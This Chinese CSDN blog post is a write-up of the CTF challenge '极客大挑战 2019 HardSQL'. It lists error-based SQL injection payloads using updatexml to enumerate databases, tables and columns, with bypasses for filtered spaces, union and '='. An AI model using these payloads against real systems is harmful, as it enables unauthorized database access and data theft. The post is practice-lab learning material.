[极客大挑战 2019]HardSQL 1

最新推荐文章于 2024-06-18 16:59:41 发布
最新推荐文章于 2024-06-18 16:59:41 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46601529/article/details/109709412
版权

在这里插入图片描述
在这里插入图片描述1.第一步猜测是什么闭合 一般用’ 或者 ‘’ 或者 ‘) 或者 ‘’)
当我们用’闭合发现报错说明可能是 ’ 这个时候再加注释 可以用%23、–+、#、–空格
在这里插入图片描述
这时候我们加上注释发现就不报错了,那么可以认定就是’闭合
在这里插入图片描述
3.这时候我们用order by 查看回显发现过滤了
在这里插入图片描述
4.这个时候我们就要在1’ 这个中间试有哪些被过滤了%23,发现select,from,or都报错了,没有回显’你可别被我逮住了,说明select,from,or都没有被过滤,但是union被过滤了,淦!!!那么正常的0’union select group_concat(schema_name)from information_schema.schemata用不了
在这里插入图片描述在这里插入图片描述
在这里插入图片描述5.那用不了union 但是我们可以用双注入

1.updatexml(1,concat(0x7e,database(),0x7e),1)
   显示单个数据库
2.updatexml(1,concat(0x7e,select group_concat(schema_name)from information_schema.schemata,0x7e),1)
   显示所有数据库
3.updatexml(1,concat(0x7e,select group_concat(table_name)from information_schema.tables where table_schema=database(),0x7e),1)
   显示所有数据表
4.updatexml(1,concat(0x7e,select group_concat(column_name)from information_schema.columns where table_name=xxx,0x7e),1)
    显示所有列
5.updatexml(1,concat(0x7e,select group_concat(id ,passwd,)from 某某库.某某表,0x7e),1)

6 or没被过滤其他也没有过滤,之前默默试了concat、1,updatexml,那么真相只有一个那就空格~呜呜呜真有他么的
在这里插入图片描述7.果然是这个该死的空格,那么我们就用括号绕过
在这里插入图片描述8.爆出数据表geek
在这里插入图片描述
9.很明显还有geek没有爆出来,位置不够,那怎么办勒,用left()、right()

在这里插入图片描述
10.也不行,那就用database()回显回来的geek,就不要勉强全部回显
在这里插入图片描述

11.因为=被过滤所以用like代替,爆出表
在这里插入图片描述
12.爆出数据列

在这里插入图片描述

13.爆值,结果有一半没出来,继续用left,right

在这里插入图片描述

14.XPATH syntax error: ‘flag{eb36352e-cbdb-4710-aa92-9

在这里插入图片描述right()=XPATH syntax error: ‘e-cbdb-4710-aa92-9e614ec6ddfd}
在这里插入图片描述

组合一下flag{eb36352e-cbdb-4710-aa92-9e614ec6ddfd}

one_菜鸡
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[极客挑战 2019]HardSQL1 解题思路
xiyuanyue的博客
10-13 232
flag{d23142e7-2546-47c3-b238-de只返回一部分flag是因为updatexml 函数返回错误信息长度是112个字符,所以要对password 截取一部分,可以通过,substr left right函数做处理 ,substr函数已经禁止,就用right函数。2、尝试联合注入、时间盲注 发现 and union /**/ /*!2、关键字替换(空格替换,单引号替换,等号替换);3、通过错误函数updatexml 获取数据库、表、字段。3、错误函数、时间盲注、条件盲注。
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
BUUCTF [极客挑战 2019] HardSQL 1
最新发布
m0_74167420的博客
06-18 220
原因:在输入' 或者 # 号时,'会被识别出来过滤掉,#会注释掉后面的内容,因此要进行url编码。在该题目中,双写被过滤掉了,同时空格,=,union也被过滤了。或者, payload为: 用 ^ 符号代替 or。1、阅读题目,是SQL注入的题目类型。2、尝试万能密码和堆叠注入,均被过滤。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
[极客挑战 2019]HardSQL
weixin_42513429的博客
04-14 744
[极客挑战 2019]HardSQL报错注入updatexml()报错注入extractvalue()报错注入 报错注入 updatexml()报错注入 打一个单引号,出现报错,再打一个单引号,发现没有报错了,所以考虑是单引号闭合,然后考虑and等关键字,发现拦截,考虑报错注入,空格也过滤了,考虑括号代替,表单提交的数据使用get方法转发到check.php,所以直接通过check.php ge...
web buuctf [极客挑战 2019]HardSQL1
weixin_44214568的博客
03-15 1969
这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值